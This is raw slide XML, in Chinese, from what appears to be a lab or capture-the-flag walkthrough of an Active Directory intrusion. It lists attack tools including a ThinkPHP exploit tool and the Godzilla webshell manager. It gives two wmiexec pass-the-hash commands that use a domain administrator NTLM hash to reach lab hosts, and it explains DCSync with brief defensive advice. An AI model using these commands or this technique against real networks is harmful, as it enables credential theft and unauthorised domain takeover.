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1365C-BD65-F22F-B2CC-8D84F0D3C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30933-BBF6-CDB5-A52A-63B91606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841B1-F2F9-46AF-B2C9-87AA475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88F44-EA11-FEE0-FCD9-609BAAB9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8BC96-01A4-1893-00A6-895BAD2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6C5F2-B859-91B5-915B-99E067EE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6F677-FDF8-23CB-705C-E38D28A3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C3FD7-B23C-9E2E-66E7-75150FE6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76493-E934-B714-35AB-D398B68B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C0902-7DDE-E274-6CA9-25F77030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A81BED-46CE-86DB-20C8-562DBF148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42BEE-CE0D-23D8-A6D4-4050112DE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5E64A-A4E2-E7DC-EFA8-CBE65E6E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8969E-3596-33C7-AF0F-A835891B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A6D69-D73F-3344-A4DA-F4CD1635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9631B-EEC9-7A66-48BD-1127D88A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5D599-1F82-1742-955A-774E4A55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44231-F6B7-A712-E769-DD810E15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29E15-01EE-0FFE-0B79-63538DFA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B0B6-BA7F-6C6D-A650-43C291A9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1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096FB-EA22-9A16-A97E-E4407372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7544B-81E8-2508-38D5-0A35581E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3CCFE-FC87-13B1-FD15-5867FFE7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A3513-453A-5B92-7384-3E428E9B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6C636-6437-78B0-610D-E57C9C78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0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C19B-258F-5EF7-3E66-56D12F99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423B-62F8-7BF4-82E3-644382E0C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B4E26-E8A0-B355-9738-1D0EE953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58A71-7DED-B314-2065-8F4387B0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7A124-3987-64AF-20E4-074893B9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17E7-42F3-BD72-EDB4-E44D789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DA55F-4DA9-10E0-26F7-D9B2A4CA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2F25E-A88E-9FF8-6E4D-2E5C2839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7774A-92FC-35A5-5746-0A119D1A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8483C-75AF-7F6A-AF8C-1DFFBB48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DA79C-C3C9-0686-8D83-690182F7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E7718B-B398-CD08-BB99-48FEF7A3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DC7287-518B-5716-1699-066AC0C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25FF98-0485-2B89-4D09-8ECEAE4A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8F9C5-D218-903C-C9DD-5F0351A1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9257A-3A09-3C48-621D-29D0BF94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EF90B-DBD3-8431-8F9D-10CED2D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58A37-D3DF-B0E4-C587-1BBBA540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7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DABD9-D1C0-9083-9B30-BB11A049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C9C7D1-27AD-31FA-887E-C4E134A1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5D4F7-3BE8-00CA-F062-D775E56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04B3-DBB3-8E79-1130-BB2B6E2A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7879-804E-6BC8-1FDC-47E8B20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08C16-7A90-8487-06EA-6EA5F63AC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032EA-96F4-3FB8-19E8-1838093D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2DB12-AF50-5971-3984-6FE2E387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61356-F3D1-BEC1-1AA0-7714A248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DE18-28A7-1EE9-AE1C-EDDD494F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2921F5-CE87-7A29-64B1-C0F1EBE4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194A7-3E4E-A97F-A2B4-19C66031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3E7ED-DD65-AB18-03B8-F192B595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16665-4EE9-521E-E711-02B53F95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BB61A-4892-9D6C-EED5-28355105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BE6CE1-8992-1FF4-C921-BB5B1F94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B140-E446-20F0-7095-86A12E71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C4787-1EE7-2999-C1F2-374B260C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05F-5791-4818-A10A-6E86C351E6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13A35-B2FE-AB4C-381C-8AA421D0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E4047-2297-39EF-62E7-CA58824A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C381-8324-4554-B8E0-527EDD7BF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xifier.com/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Lotus6/ThinkphpGUI" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ginuerzh/gost" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/shadow1ng/fscan/releas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ternallybored.org/misc/netcat/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fortra/impacket" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/BeichenDream/Godzilla/releases" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://neo4j.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sspsec/Spear" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SpecterOps/BloodHound-Legacy/releas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ACB06-03C9-8F71-17E4-AF9BD7B1F6D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202835" y="73643"/>
            <a:ext cx="1064140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工具列表：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fscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Releases · shadow1ng/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>fscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>主机端口和漏洞扫描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thinkphpgui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Lotus6/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>ThinkphpGUI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Thinkphp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>(GUI)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>漏洞利用工具，支持各版本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>TP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>漏洞检测，命令执行，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>getshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>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ssp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>渗透工具箱 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>sspsec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>/Spear: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>GO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>walis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>框架的安全渗透工具箱框架</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>：需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>go</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>语言环境编译，只是用于集合各种工具，各种工具需要手动下载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哥斯拉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Releases · </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>BeichenDream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>/Godzilla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>制作和远程连接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nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t> 1.11 for Win32/Win64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>：命令行远程连接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metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>自带的强大的渗透框架，建议在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>win</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>主机上也装上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gost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>ginuerzh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>gost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>: GO Simple Tunnel - a simple tunnel written in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>golang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>：简单建立代理隧道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proxifier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>Proxifier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t> - The Most Advanced Proxy Client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>：自定义流量重定向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BloodHound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>Releases · </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>SpecterOps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>BloodHound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>-Legacy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>：域信息搜集和拓扑图绘制，注意直接使用其中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>sharphound.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>进行信息搜集，不要额外下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Neo4j </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>Neo4j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t> Graph Database &amp; Analytics | Graph Database Management System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>：图数据库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impacket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>工具包 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>fortra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>impacket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Impacket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t> is a collection of Python classes for working with network protocols.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>：开源的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>Python </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>库，网络渗透工具包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486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C548F-46C9-22DF-62E8-F81B8DD87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12DAE8-6631-FEDC-AD14-C3A37A9782C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1343984" y="1871759"/>
            <a:ext cx="10641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step9.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>使用域管理员的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>ntlm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>哈希登录其他设备，读取剩余两段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0"/>
              <a:t>python wmiexec.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>xiaorang.lab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0"/>
              <a:t>/administrator:@172.22.1.2 -hashes :10cf89a850fb1cdbe6bb432b859164c8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python wmiexec.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>xiaorang.lab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0"/>
              <a:t>/administrator:@172.22.1.18 -hashes :10cf89a850fb1cdbe6bb432b859164c8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56415D-E9F8-5FD6-C368-71E4884C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43" y="3030845"/>
            <a:ext cx="7828655" cy="31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AB886-2279-4D74-6477-62D257AA2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0DA632-B5FE-CF68-78CD-68A23866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" y="0"/>
            <a:ext cx="1175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9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02" name="AutoShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12000216" y="6266571"/>
            <a:ext cx="191784" cy="217801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F8C033">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="400020" name="AutoShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12092682" y="6264360"/>
            <a:ext cx="191359" cy="217801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7F7F7F">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="400008" name="AutoShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="534871"/>
            <a:ext cx="223144" cy="406033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F8C033">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="F8C033">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40000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84970" y="6204585"/>
            <a:ext cx="2597785" cy="354965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1653417" y="3985457"/>
            <a:ext cx="2565012" cy="969374"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Freeform 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4524351" y="1320058"/>
            <a:ext cx="1282094" cy="1282094"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/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8" name="Freeform 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5806445" y="2402415"/>
            <a:ext cx="1282094" cy="1282094"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/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</a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:alpha val="100000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Freeform 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4524351" y="3474973"/>
            <a:ext cx="1282094" cy="1282094"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/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0" name="Freeform 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5806445" y="4551705"/>
            <a:ext cx="1282094" cy="1282094"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/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</a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:alpha val="100000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1290618" y="914499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DCSync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="16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原理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6075" y="1403350"/>
            <a:ext cx="4150360" cy="1576070"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="66008" tIns="33052" rIns="66008" bIns="33052" rtlCol="0" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="188000"/>
              </a:lnSpc>
            </a:pP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DCSync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是一种利用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Microsoft Active Directory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内部复制机制获取账户哈希（包括域管理员账户）的攻击技术。它由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Mimikatz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工具的作者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Benjamin Delpy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提出，是进行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横向移动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和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持久化控制域环境</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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的核心技术之一。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5698" y="3581653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Dcsync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="16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利用条件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9730" y="3889375"/>
            <a:ext cx="4144645" cy="182626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 fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="188000"/>
              </a:lnSpc>
            </a:pP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复制目录更改（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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DS-Replication-Get-Changes</a:t>
            </a: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lang="en-US" altLang="zh-CN" sz="1425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algn="ctr">
              <a:lnSpc>
                <a:spcPct val="188000"/>
              </a:lnSpc>
            </a:pP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全部复制目录更改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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(DS-Replication-Get-Changes-All )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="188000"/>
              </a:lnSpc>
            </a:pP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在过滤集中复制目录更改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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可有可无</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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lang="en-US" altLang="zh-CN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DS-Replication-Get-Changes-In-Filtered-Set</a:t>
            </a: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88538" y="1898733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Admin账户hash的获取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92099" y="2312835"/>
            <a:ext cx="3130173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在成功执行DCSync工具后，我们获取了域管理员账户的密码哈希值，这为我们提供了进入域内其他系统的方法。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40319" y="4197580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安全策略与措施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43879" y="4611682"/>
            <a:ext cx="3130173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altLang="zh-CN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DCSync </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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攻击利用的是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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Active Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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的合法复制机制，防护的关键在于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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限制权限、增强检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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日志审计。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="188000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1275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0007" name="AutoShape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503038" y="468853"/>
            <a:ext cx="3978077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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2575" b="1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Dcsync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02" name="AutoShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12000216" y="6266571"/>
            <a:ext cx="191784" cy="217801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F8C033">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="400020" name="AutoShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12092682" y="6264360"/>
            <a:ext cx="191359" cy="217801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7F7F7F">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="400008" name="AutoShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="534871"/>
            <a:ext cx="223144" cy="406033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F8C033">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="F8C033">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40000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84970" y="6204585"/>
            <a:ext cx="2597785" cy="354965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6249697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3776918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5012267" y="171109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Freeform 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
